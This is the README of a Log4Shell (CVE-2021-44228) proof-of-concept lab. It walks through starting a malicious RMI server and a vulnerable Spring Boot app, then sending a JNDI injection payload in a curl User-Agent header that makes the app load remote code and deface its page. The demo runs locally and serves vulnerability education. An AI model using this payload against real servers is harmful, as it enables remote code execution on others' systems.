This code may contain malware and is known to contain vulnerabilities. Use at your own risk - if you use it, be advised to do that in a VM - discard the VM after use.
This is a proof of concept for the Log4j vulnerability (CVE-2021-44228), that works by evaluating an expression that pulls external code via JNDI over RMI.
It leverages Log4j 2.5.7 from spring-boot-starter-log4j2
This repository and the exploit is heavily inspired by Labout/log4shell-rmi-poc, but updated and adopted to modern Java versions.
No requirements, except Java. The code has been tested with Java 8 (JDK 1.8.0_25), Java 11 (JDK 11.0.1) and Java 19 (openjdk 19.0.2)
git clone https://github.com/rhuss/log4shell-poc.git
cd inject-server
./startRmiServer.sh
You should get something like this:
a target/classes/static
a target/classes/static/index.html
a target/classes/static/img
a target/classes/static/img/wc.png
Starting malicious RMI Server
Creating evil RMI registry on port 1099
Bind remote exploit to 'WannaCry'
In a new Terminal
cd vulnerable-app
./startVulnerableService.sh
open http://localhost:8080
The original website is opened in your browser.
curl http://localhost:8080 --header 'User-Agent: ${jndi:rmi://127.0.0.1:1099/WannaCry}'
The website gets updated with the data provided from malicious RMI server that has been started in the first step.
Note
To protect against real exploitation, this must be done from a client located at 127.0.0.1.
open http://localhost:8080
(or just reload the previous page in your browser). The hacked website is returned.